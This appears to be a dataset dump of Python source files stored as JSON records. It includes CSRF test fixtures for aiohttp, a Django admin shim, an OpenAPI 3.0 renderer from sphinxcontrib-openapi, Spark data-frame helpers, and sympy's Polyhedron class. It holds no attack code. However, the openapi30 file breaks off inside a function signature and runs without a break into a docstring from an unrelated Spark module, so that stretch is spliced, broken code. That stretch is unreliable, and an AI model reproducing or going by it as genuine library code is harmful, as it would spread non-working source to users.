app\n\n yield go\n\n\n@pytest.fixture(params=[\n (aiohttp_csrf.policy.FormPolicy, (FORM_FIELD_NAME,)),\n (aiohttp_csrf.policy.FormAndHeaderPolicy, (HEADER_NAME, FORM_FIELD_NAME)),\n])\ndef csrf_form_policy(request):\n _class, args = request.param\n\n return _class(*args)\n\n\n@pytest.fixture(params=[\n (aiohttp_csrf.policy.HeaderPolicy, (HEADER_NAME,)),\n (aiohttp_csrf.policy.FormAndHeaderPolicy, (HEADER_NAME, FORM_FIELD_NAME)),\n])\ndef csrf_header_policy(request):\n _class, args = request.param\n\n return _class(*args)\n\n\n@pytest.fixture(params=[\n (aiohttp_csrf.storage.SessionStorage, (SESSION_NAME,)),\n (aiohttp_csrf.storage.CookieStorage, (COOKIE_NAME,)),\n])\ndef csrf_storage(request):\n _class, args = request.param\n\n return _class(*args)\n"} {"ext": "py", "sha": "1a2f19cc0f4e0c144822e2b2571cdbfe170f1ec3", "content": "#!/home/access/Downloads/Desktop/Django_IPs/week4_IP/neighbourhood/virtual/bin/python3.8\n# When the django-admin.py deprecation ends, remove this script.\nimport warnings\n\nfrom django.core import management\n\ntry:\n from django.utils.deprecation import RemovedInDjango40Warning\nexcept ImportError:\n raise ImportError(\n 'django-admin.py was deprecated in Django 3.1 and removed in Django '\n '4.0. Please manually remove this script from your virtual environment '\n 'and use django-admin instead.'\n )\n\nif __name__ == \"__main__\":\n warnings.warn(\n 'django-admin.py is deprecated in favor of django-admin.',\n RemovedInDjango40Warning,\n )\n management.execute_from_command_line()\n"} {"ext": "py", "sha": "1a2f1a7039bf078ca8ad698605d42a9ba5d862d2", "content": "\"\"\"\n sphinxcontrib.openapi.openapi30\n -------------------------------\n\n The OpenAPI 3.0.0 spec renderer. Based on ``sphinxcontrib-httpdomain``.\n\n :copyright: (c) 2016, Ihor Kalnytskyi.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nimport copy\n\nimport collections\nimport collections.abc\n\nfrom datetime import datetime\nimport itertools\nimport json\nimport re\nfrom urllib import parse\nfrom http.client import responses as http_status_codes\n\nfrom sphinx.util import logging\n\nfrom sphinxcontrib.openapi import utils\n\n\nLOG = logging.getLogger(__name__)\n\n# https://github.com/OAI/OpenAPI-Specification/blob/3.0.2/versions/3.0.0.md#data-types\n_TYPE_MAPPING = {\n ('integer', 'int32'): 1, # integer\n ('integer', 'int64'): 1, # long\n ('number', 'float'): 1.0, # float\n ('number', 'double'): 1.0, # double\n ('boolean', None): True, # boolean\n ('string', None): 'string', # string\n ('string', 'byte'): 'c3RyaW5n', # b'string' encoded in base64, # byte\n ('string', 'binary'): '01010101', # binary\n ('string', 'date'): datetime.now().date().isoformat(), # date\n ('string', 'date-time'): datetime.now().isoformat(), # dateTime\n ('string', 'password'): '********', # password\n\n # custom extensions to handle common formats\n ('string', 'email'): 'name@example.com',\n ('string', 'zip-code'): '90210',\n ('string', 'uri'): 'https://example.com',\n\n # additional fallthrough cases\n ('integer', None): 1, # integer\n ('number', None): 1.0, # \n}\n\n_READONLY_PROPERTY = object() # sentinel for values not included in requests\n\n\ndef _dict_merge(dct, merge_dct):\n \"\"\"Recursive dict merge.\n\n Inspired by :meth:``dict.update()``, instead of updating only top-level\n keys, dict_merge recurses down into dicts nested to an arbitrary depth,\n updating keys. The ``merge_dct`` is merged into ``dct``.\n\n From https://gist.github.com/angstwad/bf22d1822c38a92ec0a9\n\n Arguments:\n dct: dict onto which the merge is executed\n merge_dct: dct merged into dct\n \"\"\"\n for k in merge_dct.keys():\n if (k in dct and isinstance(dct[k], dict)\n and isinstance(merge_dct[k], collections.abc.Mapping)):\n _dict_merge(dct[k], merge_dct[k])\n else:\n dct[k] = merge_dct[k]\n\n\ndef _parse_schema(schema, method):\n \"\"\"\n Convert a Schema Object to a Python object.\n\n Args:\n schema: An ``OrderedDict`` representing the schema object.\n \"\"\"\n if method and schema.get('readOnly', False):\n return _READONLY_PROPERTY\n\n # allOf: Must be valid against all of the subschemas\n if 'allOf' in schema:\n schema_ = copy.deepcopy(schema['allOf'][0])\n for x in schema['allOf'][1:]:\n _dict_merge(schema_, x)\n\n return _parse_schema(schema_, method)\n\n # anyOf: Must be valid against any of the subschemas\n # TODO(stephenfin): Handle anyOf\n\n # oneOf: Must be valid against exactly one of the subschemas\n if 'oneOf' in schema:\n # we only show the first one since we can't show everything\n return _parse_schema(schema['oneOf'][0], method)\n\n if 'enum' in schema:\n # we only show the first one since we can't show everything\n return schema['enum'][0]\n\n schema_type = schema.get('type', 'object')\n\n if schema_type == 'array':\n # special case oneOf and anyOf so that we can show examples for all\n # possible combinations\n if 'oneOf' in schema['items']:\n return [\n _parse_schema(x, method) for x in schema['items']['oneOf']\n ]\n\n if 'anyOf' in schema['items']:\n return [\n _parse_schema(x, method) for x in schema['items']['anyOf']\n ]\n\n return [_parse_schema(schema['items'], method)]\n\n if schema_type == 'object':\n if method and 'properties' in schema and \\\n all(v.get('readOnly', False)\n for v in schema['properties'].values()):\n return _READONLY_PROPERTY\n\n results = []\n for name, prop in schema.get('properties', {}).items():\n result = _parse_schema(prop, method)\n if result != _READONLY_PROPERTY:\n results.append((name, result))\n\n return collections.OrderedDict(results)\n\n if (schema_type, schema.get('format')) in _TYPE_MAPPING:\n return _TYPE_MAPPING[(schema_type, schema.get('format'))]\n\n return _TYPE_MAPPING[(schema_type, None)] # unrecognized format\n\n\ndef _example(media_type_objects, method=None, endpoint=None, status=None,\n nb_indent=0):\n \"\"\"\n Format examples in `Media Type Object` openapi v3 to HTTP request or\n HTTP response example.\n If method and endpoint is provided, this function prints a request example\n else status should be provided to print a response example.\n\n Arguments:\n media_type_objects (Dict[str, Dict]): Dict containing\n Media Type Objects.\n method: The HTTP method to use in example.\n endpoint: The HTTP route to use in example.\n status: The HTTP status to use in example.\n \"\"\"\n indent = ' '\n extra_indent = indent * nb_indent\n\n if method is not None:\n method = method.upper()\n else:\n try:\n # one of possible values for status might be 'default'.\n # in the case, just fallback to '-'\n status_text = http_status_codes[int(status)]\n except (ValueError, KeyError):\n status_text = '-'\n\n # Provide request samples for GET requests\n if method == 'GET':\n media_type_objects[''] = {\n 'examples': {'Example request': {'value': ''}}}\n\n for content_type, content in media_type_objects.items():\n examples = content.get('examples')\n example = content.get('example')\n\n # Try to get the example from the schema\n if example is None and 'schema' in content:\n example = content['schema'].get('example')\n\n if examples is None:\n examples = {}\n if not example:\n if re.match(r\"application/[a-zA-Z\\+]*json\", content_type) is \\\n None:\n LOG.info('skipping non-JSON example generation.')\n continue\n example = _parse_schema(content['schema'], method=method)\n\n if method is None:\n examples['Example response'] = {\n 'value': example,\n }\n else:\n examples['Example request'] = {\n 'value': example,\n }\n\n for example in examples.values():\n # According to OpenAPI v3 specs, string examples should be left unchanged\n if not isinstance(example['value'], str):\n example['value'] = json.dumps(\n example['value'], indent=4, separators=(',', ': '))\n\n for example_name, example in examples.items():\n if 'summary' in example:\n example_title = '{example_name} - {example[summary]}'.format(\n **locals())\n else:\n example_title = example_name\n\n yield ''\n yield '{extra_indent}**{example_title}:**'.format(**locals())\n yield ''\n yield '{extra_indent}.. sourcecode:: http'.format(**locals())\n yield ''\n\n # Print http request example\n if method:\n yield '{extra_indent}{indent}{method} {endpoint} HTTP/1.1' \\\n .format(**locals())\n yield '{extra_indent}{indent}Host: example.com' \\\n .format(**locals())\n if content_type:\n yield '{extra_indent}{indent}Content-Type: {content_type}'\\\n .format(**locals())\n\n # Print http response example\n else:\n yield '{extra_indent}{indent}HTTP/1.1 {status} {status_text}' \\\n .format(**locals())\n yield '{extra_indent}{indent}Content-Type: {content_type}' \\\n .format(**locals())\n\n yield ''\n for example_line in example['value'].splitlines():\n yield '{extra_indent}{indent}{example_line}'.format(**locals())\n if example['value'].splitlines():\n yield ''\n\n\ndef convert_json_schema(schema, directive=':>> spark = pyspark.sql.SparkSession.builder.getOrCreate()\n >>> df = create_spark_df(spark,\n >>> [[1, 1.1, 'one'], [2, 2.2, 'two']],\n >>> schema=['int', 'float', 'str'],\n >>> process_methods=[('repartition', (), {'numPartitions': 6})])\n >>> df.show()\n +---+-----+---+\n |int|float|str|\n +---+-----+---+\n | 2| 2.2|two|\n | 1| 1.1|one|\n +---+-----+---+\n\n :param pyspark.sql.SparkSession spark: SparkSession instance\n :param data: input dataset\n :param schema: schema of created data frame\n :param iterable process_methods: methods to apply on the data frame after creation\n :returns: created data frame\n :rtype: pyspark.sql.DataFrame\n \"\"\"\n # check if data-frame schema was provided\n if isinstance(schema, int):\n # infer schema from a single row (prevents Spark >= 1.6.1 from checking schema of all rows)\n def get_row(data, ind):\n \"\"\"Get row.\"\"\"\n try:\n return data.iloc[ind].tolist()\n except AttributeError:\n pass\n try:\n row = data.first()\n if ind > 0:\n logger.warning('Inferring data-frame schema from first row, instead of row with index {i:d}', i=ind)\n return row\n except AttributeError:\n pass\n try:\n return data[ind]\n except TypeError:\n raise TypeError('Unable to get row from data of type \"{!s}\" to infer schema.'.format(type(data)))\n\n row = get_row(data, schema)\n\n def to_python_type(var):\n \"\"\"Get item.\"\"\"\n try:\n return var.item()\n except AttributeError:\n return var\n\n schema = pyspark.sql.types._infer_schema(tuple(to_python_type(it) for it in row))\n try:\n for t, n in zip(schema.fields, data.columns):\n t.name = str(n)\n except AttributeError:\n pass\n elif isinstance(schema, dict):\n # create schema from dictionary of (name, data type) pairs\n schema = df_schema(schema)\n kwargs['schema'] = schema\n\n # check if input is a data frame\n if isinstance(data, pyspark.sql.DataFrame):\n if not kwargs['schema']:\n kwargs['schema'] = data.schema\n data = data.rdd\n\n # create and transform data frame\n df = spark.createDataFrame(data, **kwargs)\n if process_methods:\n df = apply_transform_funcs(df, process_methods)\n return df\n\n\ndef df_schema(schema_spec):\n \"\"\"Create Spark data-frame schema.\n\n Create a schema for a Spark data frame from a dictionary of (name, data\n type) pairs, describing the columns. Data types are specified by Python\n types or by Spark-SQL types from the pyspark.sql.types module.\n\n >>> from collections import OrderedDict as odict\n >>> schema_dict = odict()\n >>> schema_dict['foo'] = pyspark.sql.types.IntegerType()\n >>> schema_dict['bar'] = odict([('descr', str), ('val', float)])\n >>> print(schema_dict)\n OrderedDict([('foo', IntegerType), ('bar', OrderedDict([('descr', ), ('val', )]))])\n >>> spark = pyspark.sql.SparkSession.builder.getOrCreate()\n >>> df = spark.createDataFrame([(1, ('one', 1.1)), (2, ('two', 2.2))], schema=df_schema(schema_dict))\n >>> df.show()\n +---+---------+\n |foo| bar|\n +---+---------+\n | 1|[one,1.1]|\n | 2|[two,2.2]|\n +---+---------+\n\n :param dict schema_spec: schema specification\n :returns: data-frame schema\n :rtype: pyspark.sql.types.StructType\n :raises: TypeError if data type is specified incorrectly\n \"\"\"\n def get_field(name, data_type):\n \"\"\"Return a struct field for specified data type.\"\"\"\n # treat dictionaries as struct types\n if isinstance(data_type, dict):\n data_type = pyspark.sql.types.StructType([get_field(*spec) for spec in data_type.items()])\n\n # convert Python types to Spark-SQL types\n data_type = SPARK_SQL_TYPES.get(data_type, data_type)\n\n # convert Spark-SQL type classes to Spark-SQL types\n if isinstance(data_type, type) and issubclass(data_type, pyspark.sql.types.DataType):\n data_type = data_type()\n\n # check and return data type\n if not isinstance(data_type, pyspark.sql.types.DataType):\n raise TypeError('Type specifications for data-frame schemas must be DataTypes or dictionaries')\n return pyspark.sql.types.StructField(str(name), data_type)\n\n # return a struct type with a list of struct fields for specified data types\n return pyspark.sql.types.StructType([get_field(*spec) for spec in schema_spec.items()])\n\n\ndef hive_table_from_df(spark, df, db, table):\n \"\"\"Create a Hive table from a Spark data frame.\n\n :param pyspark.sql.SparkSession spark: SparkSession instance\n :param pyspark.sql.DataFrame df: input data frame\n :param str db: database for table\n :param str table: name of table\n \"\"\"\n # register temporary table\n temp_name = '{0:s}_{1:s}'.format(table, uuid.uuid4().hex)\n df.createOrReplaceTempView(temp_name)\n\n # create table\n table_spec = '.'.join(s for s in (db, table) if s)\n create_table_query = 'CREATE TABLE {spec} AS SELECT {cols} FROM {name}'\\\n .format(name=temp_name, spec=table_spec, cols=', '.join(c for c in df.columns))\n logger.debug(create_table_query)\n spark.sql(create_table_query)\n"} {"ext": "py", "sha": "1a2f1ba9fc07fd45ad77d1130f313f8ae5c254b2", "content": "from sympy.combinatorics import Permutation as Perm\nfrom sympy.combinatorics.perm_groups import PermutationGroup\nfrom sympy.core import Basic, Tuple\nfrom sympy.core.compatibility import as_int\nfrom sympy.sets import FiniteSet\nfrom sympy.utilities.iterables import (minlex, unflatten, flatten)\n\nrmul = Perm.rmul\n\n\nclass Polyhedron(Basic):\n \"\"\"\n Represents the polyhedral symmetry group (PSG).\n\n Explanation\n ===========\n\n The PSG is one of the symmetry groups of the Platonic solids.\n There are three polyhedral groups: the tetrahedral group\n of order 12, the octahedral group of order 24, and the\n icosahedral group of order 60.\n\n All doctests have been given in the docstring of the\n constructor of the object.\n\n References\n ==========\n\n .. [1] http://mathworld.wolfram.com/PolyhedralGroup.html\n\n \"\"\"\n _edges = None\n\n def __new__(cls, corners, faces=[], pgroup=[]):\n \"\"\"\n The constructor of the Polyhedron group object.\n\n Explanation\n ===========\n\n It takes up to three parameters: the corners, faces, and\n allowed transformations.\n\n The corners/vertices are entered as a list of arbitrary\n expressions that are used to identify each vertex.\n\n The faces are entered as a list of tuples of indices; a tuple\n of indices identifies the vertices which define the face. They\n should be entered in a cw or ccw order; they will be standardized\n by reversal and rotation to be give the lowest lexical ordering.\n If no faces are given then no edges will be computed.\n\n >>> from sympy.combinatorics.polyhedron import Polyhedron\n >>> Polyhedron(list('abc'), [(1, 2, 0)]).faces\n FiniteSet((0, 1, 2))\n >>> Polyhedron(list('abc'), [(1, 0, 2)]).faces\n FiniteSet((0, 1, 2))\n\n The allowed transformations are entered as allowable permutations\n of the vertices for the polyhedron. Instance of Permutations\n (as with faces) should refer to the supplied vertices by index.\n These permutation are stored as a PermutationGroup.\n\n Examples\n ========\n\n >>> from sympy.combinatorics.permutations import Permutation\n >>> from sympy.interactive import init_printing\n >>> from sympy.abc import w, x, y, z\n >>> init_printing(pretty_print=False, perm_cyclic=False)\n\n Here we construct the Polyhedron object for a tetrahedron.\n\n >>> corners = [w, x, y, z]\n >>> faces = [(0, 1, 2), (0, 2, 3), (0, 3, 1), (1, 2, 3)]\n\n Next, allowed transformations of the polyhedron must be given. This\n is given as permutations of vertices.\n\n Although the vertices of a tetrahedron can be numbered in 24 (4!)\n different ways, there are only 12 different orientations for a\n physical tetrahedron. The following permutations, applied once or\n twice, will generate all 12 of the orientations. (The identity\n permutation, Permutation(range(4)), is not included since it does\n not change the orientation of the vertices.)\n\n >>> pgroup = [Permutation([[0, 1, 2], [3]]), \\\n Permutation([[0, 1, 3], [2]]), \\\n Permutation([[0, 2, 3], [1]]), \\\n Permutation([[1, 2, 3], [0]]), \\\n Permutation([[0, 1], [2, 3]]), \\\n Permutation([[0, 2], [1, 3]]), \\\n Permutation([[0, 3], [1, 2]])]\n\n The Polyhedron is now constructed and demonstrated:\n\n >>> tetra = Polyhedron(corners, faces, pgroup)\n >>> tetra.size\n 4\n >>> tetra.edges\n FiniteSet((0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3))\n >>> tetra.corners\n (w, x, y, z)\n\n It can be rotated with an arbitrary permutation of vertices, e.g.\n the following permutation is not in the pgroup:\n\n >>> tetra.rotate(Permutation([0, 1, 3, 2]))\n >>> tetra.corners\n (w, x, z, y)\n\n An allowed permutation of the vertices can be constructed by\n repeatedly applying permutations from the pgroup to the vertices.\n Here is a demonstration that applying p and p**2 for every p in\n pgroup generates all the orientations of a tetrahedron and no others:\n\n >>> all = ( (w, x, y, z), \\\n (x, y, w, z), \\\n (y, w, x, z), \\\n (w, z, x, y), \\\n (z, w, y, x), \\\n (w, y, z, x), \\\n (y, z, w, x), \\\n (x, z, y, w), \\\n (z, y, x, w), \\\n (y, x, z, w), \\\n (x, w, z, y), \\\n (z, x, w, y) )\n\n >>> got = []\n >>> for p in (pgroup + [p**2 for p in pgroup]):\n ... h = Polyhedron(corners)\n ... h.rotate(p)\n ... got.append(h.corners)\n ...\n >>> set(got) == set(all)\n True\n\n The make_perm method of a PermutationGroup will randomly pick\n permutations, multiply them together, and return the permutation that\n can be applied to the polyhedron to give the orientation produced\n by those individual permutations.\n\n Here, 3 permutations are used:\n\n >>> tetra.pgroup.make_perm(3) # doctest: +SKIP\n Permutation([0, 3, 1, 2])\n\n To select the permutations that should be used, supply a list\n of indices to the permutations in pgroup in the order they should\n be applied:\n\n >>> use = [0, 0, 2]\n >>> p002 = tetra.pgroup.make_perm(3, use)\n >>> p002\n Permutation([1, 0, 3, 2])\n\n\n Apply them one at a time:\n\n >>> tetra.reset()\n >>> for i in use:\n ... tetra.rotate(pgroup[i])\n ...\n >>> tetra.vertices\n (x, w, z, y)\n >>> sequentially = tetra.vertices\n\n Apply the composite permutation:\n\n >>> tetra.reset()\n >>> tetra.rotate(p002)\n >>> tetra.corners\n (x, w, z, y)\n >>> tetra.corners in all and tetra.corners == sequentially\n True\n\n Notes\n =====\n\n Defining permutation groups\n ---------------------------\n\n It is not necessary to enter any permutations, nor is necessary to\n enter a complete set of transformations. In fact, for a polyhedron,\n all configurations can be constructed from just two permutations.\n For example, the orientations of a tetrahedron can be generated from\n an axis passing through a vertex and face and another axis passing\n through a different vertex or from an axis passing through the\n midpoints of two edges opposite of each other.\n\n For simplicity of presentation, consider a square --\n not a cube -- with vertices 1, 2, 3, and 4:\n\n 1-----2 We could think of axes of rotation being:\n | | 1) through the face\n | | 2) from midpoint 1-2 to 3-4 or 1-3 to 2-4\n 3-----4 3) lines 1-4 or 2-3\n\n\n To determine how to write the permutations, imagine 4 cameras,\n one at each corner, labeled A-D:\n\n A B A B\n 1-----2 1-----3 vertex index:\n | | | | 1 0\n | | | | 2 1\n 3-----4 2-----4 3 2\n C D C D 4 3\n\n original after rotation\n along 1-4\n\n A diagonal and a face axis will be chosen for the \"permutation group\"\n from which any orientation can be constructed.\n\n >>> pgroup = []\n\n Imagine a clockwise rotation when viewing 1-4 from camera A. The new\n orientation is (in camera-order): 1, 3, 2, 4 so the permutation is\n given using the *indices* of the vertices as:\n\n >>> pgroup.append(Permutation((0, 2, 1, 3)))\n\n Now imagine rotating clockwise when looking down an axis entering the\n center of the square as viewed. The new camera-order would be\n 3, 1, 4, 2 so the permutation is (using indices):\n\n >>> pgroup.append(Permutation((2, 0, 3, 1)))\n\n The square can now be constructed:\n ** use real-world labels for the vertices, entering them in\n camera order\n ** for the faces we use zero-based indices of the vertices\n in *edge-order* as the face is traversed; neither the\n direction nor the starting point matter -- the faces are\n only used to define edges (if so desired).\n\n >>> square = Polyhedron((1, 2, 3, 4), [(0, 1, 3, 2)], pgroup)\n\n To rotate the square with a single permutation we can do:\n\n >>> square.rotate(square.pgroup[0])\n >>> square.corners\n (1, 3, 2, 4)\n\n To use more than one permutation (or to use one permutation more\n than once) it is more convenient to use the make_perm method:\n\n >>> p011 = square.pgroup.make_perm([0, 1, 1]) # diag flip + 2 rotations\n >>> square.reset() # return to initial orientation\n >>> square.rotate(p011)\n >>> square.corners\n (4, 2, 3, 1)\n\n Thinking outside the box\n ------------------------\n\n Although the Polyhedron object has a direct physical meaning, it\n actually has broader application. In the most general sense it is\n just a decorated PermutationGroup, allowing one to connect the\n permutations to something physical. For example, a Rubik's cube is\n not a proper polyhedron, but the Polyhedron class can be used to\n represent it in a way that helps to visualize the Rubik's cube.\n\n >>> from sympy.utilities.iterables import flatten, unflatten\n >>> from sympy import symbols\n >>> from sympy.combinatorics import RubikGroup\n >>> facelets = flatten([symbols(s+'1:5') for s in 'UFRBLD'])\n >>> def show():\n ... pairs = unflatten(r2.corners, 2)\n ... print(pairs[::2])\n ... print(pairs[1::2])\n ...\n >>> r2 = Polyhedron(facelets, pgroup=RubikGroup(2))\n >>> show()\n [(U1, U2), (F1, F2), (R1, R2), (B1, B2), (L1, L2), (D1, D2)]\n [(U3, U4), (F3, F4), (R3, R4), (B3, B4), (L3, L4), (D3, D4)]\n >>> r2.rotate(0) # cw rotation of F\n >>> show()\n [(U1, U2), (F3, F1), (U3, R2), (B1, B2), (L1, D1), (R3, R1)]\n [(L4, L2), (F4, F2), (U4, R4), (B3, B4), (L3, D2), (D3, D4)]\n\n Predefined Polyhedra\n ====================\n\n For convenience, the vertices and faces are defined for the following\n standard solids along with a permutation group for transformations.\n When the polyhedron is oriented as indicated below, the vertices in\n a given horizontal plane are numbered in ccw direction, starting from\n the vertex that will give the lowest indices in a given face. (In the\n net of the vertices, indices preceded by \"-\" indicate replication of\n the lhs index in the net.)\n\n tetrahedron, tetrahedron_faces\n ------------------------------\n\n 4 vertices (vertex up) net:\n\n 0 0-0\n 1 2 3-1\n\n 4 faces:\n\n (0, 1, 2) (0, 2, 3) (0, 3, 1) (1, 2, 3)\n\n cube, cube_faces\n ----------------\n\n 8 vertices (face up) net:\n\n 0 1 2 3-0\n 4 5 6 7-4\n\n 6 faces:\n\n (0, 1, 2, 3)\n (0, 1, 5, 4) (1, 2, 6, 5) (2, 3, 7, 6) (0, 3, 7, 4)\n (4, 5, 6, 7)\n\n octahedron, octahedron_faces\n ----------------------------\n\n 6 vertices (vertex up) net:\n\n 0 0 0-0\n 1 2 3 4-1\n 5 5 5-5\n\n 8 faces:\n\n (0, 1, 2) (0, 2, 3) (0, 3, 4) (0, 1, 4)\n (1, 2, 5) (2, 3, 5) (3, 4, 5) (1, 4, 5)\n\n dodecahedron, dodecahedron_faces\n --------------------------------\n\n 20 vertices (vertex up) net:\n\n 0 1 2 3 4 -0\n 5 6 7 8 9 -5\n 14 10 11 12 13-14\n 15 16 17 18 19-15\n\n 12 faces:\n\n (0, 1, 2, 3, 4) (0, 1, 6, 10, 5) (1, 2, 7, 11, 6)\n (2, 3, 8, 12, 7) (3, 4, 9, 13, 8) (0, 4, 9, 14, 5)\n (5, 10, 16, 15, 14) (6, 10, 16, 17, 11) (7, 11, 17, 18, 12)\n (8, 12, 18, 19, 13) (9, 13, 19, 15, 14)(15, 16, 17, 18, 19)\n\n icosahedron, icosahedron_faces\n ------------------------------\n\n 12 vertices (face up) net:\n\n 0 0 0 0 -0\n 1 2 3 4 5 -1\n 6 7 8 9 10 -6\n 11 11 11 11 -11\n\n 20 faces:\n\n (0, 1, 2) (0, 2, 3) (0, 3, 4)\n (0, 4, 5) (0, 1, 5) (1, 2, 6)\n (2, 3, 7) (3, 4, 8) (4, 5, 9)\n (1, 5, 10) (2, 6, 7) (3, 7, 8)\n (4, 8, 9) (5, 9, 10) (1, 6, 10)\n (6, 7, 11) (7, 8, 11) (8, 9, 11)\n (9, 10, 11) (6, 10, 11)\n\n >>> from sympy.combinatorics.polyhedron import cube\n >>> cube.edges\n FiniteSet((0, 1), (0, 3), (0, 4), (1, 2), (1, 5), (2, 3), (2, 6), (3, 7), (4, 5), (4, 7), (5, 6), (6, 7))\n\n If you want to use letters or other names for the corners you\n can still use the pre-calculated faces:\n\n >>> corners = list('abcdefgh')\n >>> Polyhedron(corners, cube.faces).corners\n (a, b, c, d, e, f, g, h)\n\n References\n ==========\n\n .. [1] www.ocf.berkeley.edu/~wwu/articles/platonicsolids.pdf\n\n \"\"\"\n faces = [minlex(f, directed=False, is_set=True) for f in faces]\n corners, faces, pgroup = args = \\\n [Tuple(*a) for a in (corners, faces, pgroup)]\n obj = Basic.__new__(cls, *args)\n obj._corners = tuple(corners) # in order given\n obj._faces = FiniteSet(*faces)\n if pgroup and pgroup[0].size != len(corners):\n raise ValueError(\"Permutation size unequal to number of corners.\")\n # use the identity permutation if none are given\n obj._pgroup = PermutationGroup(\n pgroup or [Perm(range(len(corners)))] )\n return obj\n\n @property\n def corners(self):\n \"\"\"\n Get the corners of the Polyhedron.\n\n The method ``vertices`` is an alias for ``corners``.\n\n Examples\n ========\n\n >>> from sympy.combinatorics import Polyhedron\n >>> from sympy.abc import a, b, c, d\n >>> p = Polyhedron(list('abcd'))\n >>> p.corners == p.vertices == (a, b, c, d)\n True\n\n See Also\n ========\n\n array_form, cyclic_form\n \"\"\"\n return self._corners\n vertices = corners\n\n @property\n def array_form(self):\n \"\"\"Return the indices of the corners.\n\n The indices are given relative to the original position of corners.\n\n Examples\n ========\n\n >>> from sympy.combinatorics.polyhedron import tetrahedron\n >>> tetrahedron = tetrahedron.copy()\n >>> tetrahedron.array_form\n [0, 1, 2, 3]\n\n >>> tetrahedron.rotate(0)\n >>> tetrahedron.array_form\n [0, 2, 3, 1]\n >>> tetrahedron.pgroup[0].array_form\n [0, 2, 3, 1]\n\n See Also\n ========\n\n corners, cyclic_form\n \"\"\"\n corners = list(self.args[0])\n return [corners.index(c) for c in self.corners]\n\n @property\n def cyclic_form(self):\n \"\"\"Return the indices of the corners in cyclic notation.\n\n The indices are given relative to the original position of corners.\n\n See Also\n ========\n\n corners, array_form\n \"\"\"\n return Perm._af_new(self.array_form).cyclic_form\n\n @property\n def size(self):\n \"\"\"\n Get the number of corners of the Polyhedron.\n \"\"\"\n return len(self._corners)\n\n @property\n def faces(self):\n \"\"\"\n Get the faces of the Polyhedron.\n \"\"\"\n return self._faces\n\n @property\n def pgroup(self):\n \"\"\"\n Get the permutations of the Polyhedron.\n \"\"\"\n return self._pgroup\n\n @property\n def edges(self):\n \"\"\"\n Given the faces of the polyhedra we can get the edges.\n\n Examples\n ========\n\n >>> from sympy.combinatorics import Polyhedron\n >>> from sympy.abc import a, b, c\n >>> corners = (a, b, c)\n >>> faces = [(0, 1, 2)]\n >>> Polyhedron(corners, faces).edges\n FiniteSet((0, 1), (0, 2), (1, 2))\n\n \"\"\"\n if self._edges is None:\n output = set()\n for face in self.faces:\n for i in range(len(face)):\n edge = tuple(sorted([face[i], face[i - 1]]))\n output.add(edge)\n self._edges = FiniteSet(*output)\n return self._edges\n\n def rotate(self, perm):\n \"\"\"\n Apply a permutation to the polyhedron *in place*. The permutation\n may be given as a Permutation instance or an integer indicating\n which permutation from pgroup of the Polyhedron should be\n applied.\n\n This is an operation that is analogous to rotation about\n an axis by a fixed increment.\n\n Notes\n =====\n\n When a Permutation is applied, no check is done to see if that\n is a valid permutation for the Polyhedron. For example, a cube\n could be given a permutation which effectively swaps only 2\n vertices. A valid permutation (that rotates the object in a\n physical way) will be obtained if one only uses\n permutations from the ``pgroup`` of the Polyhedron. On the other\n hand, allowing arbitrary rotations (applications of permutations)\n gives a way to follow named elements rather than indices since\n Polyhedron allows vertices to be named while Permutation works\n only with indices.\n\n Examples\n ========\n\n >>> from sympy.combinatorics import Polyhedron, Permutation\n >>> from sympy.combinatorics.polyhedron import cube\n >>> cube = cube.copy()\n >>> cube.corners\n (0, 1, 2, 3, 4, 5, 6, 7)\n >>> cube.rotate(0)\n >>> cube.corners\n (1, 2, 3, 0, 5, 6, 7, 4)\n\n A non-physical \"rotation\" that is not prohibited by this method:\n\n >>> cube.reset()\n >>> cube.rotate(Permutation([[1, 2]], size=8))\n >>> cube.corners\n (0, 2, 1, 3, 4, 5, 6, 7)\n\n Polyhedron can be used to follow elements of set that are\n identified by letters instead of integers:\n\n >>> shadow = h5 = Polyhedron(list('abcde'))\n >>> p = Permutation([3, 0, 1, 2, 4])\n >>> h5.rotate(p)\n >>> h5.corners\n (d, a, b, c, e)\n >>> _ == shadow.corners\n True\n >>> copy = h5.copy()\n >>> h5.rotate(p)\n >>> h5.corners == copy.corners\n False\n \"\"\"\n if not isinstance(perm, Perm):\n perm = self.pgroup[perm]\n # and we know it's valid\n else:\n if perm.size != self.size:\n raise ValueError('Polyhedron and Permutation sizes differ.')\n a = perm.array_form\n corners = [self.corners[a[i]] for i in range(len(self.corners))]\n self._corners = tuple(corners)\n\n def reset(self):\n \"\"\"Return corners to their original positions.\n\n Examples\n ========\n\n >>> from sympy.combinatorics.polyhedron import tetrahedron as T\n >>> T = T.copy()\n >>> T.corners\n (0, 1, 2, 3)\n >>> T.rotate(0)\n >>> T.corners\n (0, 2, 3, 1)\n >>> T.reset()\n >>> T.corners\n (0, 1, 2, 3)\n \"\"\"\n self._corners = self.args[0]\n\n\ndef _pgroup_calcs():\n \"\"\"Return the permutation groups for each of the polyhedra and the face\n definitions: tetrahedron, cube, octahedron, dodecahedron, icosahedron,\n tetrahedron_faces, cube_faces, octahedron_faces, dodecahedron_faces,\n icosahedron_faces\n\n Explanation\n ===========\n\n (This author didn't find and didn't know of a better way to do it though\n there likely is such a way.)\n\n Although only 2 permutations are needed for a polyhedron in order to\n generate all the possible orientations, a group of permutations is\n provided instead. A set of permutations is called a \"group\" if::\n\n a*b = c (for any pair of permutations in the group, a and b, their\n product, c, is in the group)\n\n a*(b*c) = (a*b)*c (for any 3 permutations in the group associativity holds)\n\n there is an identity permutation, I, such that I*a = a*I for all elements\n in the group\n\n a*b = I (the inverse of each permutation is also in the group)\n\n None of the polyhedron groups defined follow these definitions of a group.\n Instead, they are selected to contain those permutations whose powers\n alone will construct all orientations of the polyhedron, i.e. for\n permutations ``a``, ``b``, etc... in the group, ``a, a**2, ..., a**o_a``,\n ``b, b**2, ..., b**o_b``, etc... (where ``o_i`` is the order of\n permutation ``i``) generate all permutations of the polyhedron instead of\n mixed products like ``a*b``, ``a*b**2``, etc....\n\n Note that for a polyhedron with n vertices, the valid permutations of the\n vertices exclude those that do not maintain its faces. e.g. the\n permutation BCDE of a square's four corners, ABCD, is a valid\n permutation while CBDE is not (because this would twist the square).\n\n Examples\n ========\n\n The is_group checks for: closure, the presence of the Identity permutation,\n and the presence of the inverse for each of the elements in the group. This\n confirms that none of the polyhedra are true groups:\n\n >>> from sympy.combinatorics.polyhedron import (\n ... tetrahedron, cube, octahedron, dodecahedron, icosahedron)\n ...\n >>> polyhedra = (tetrahedron, cube, octahedron, 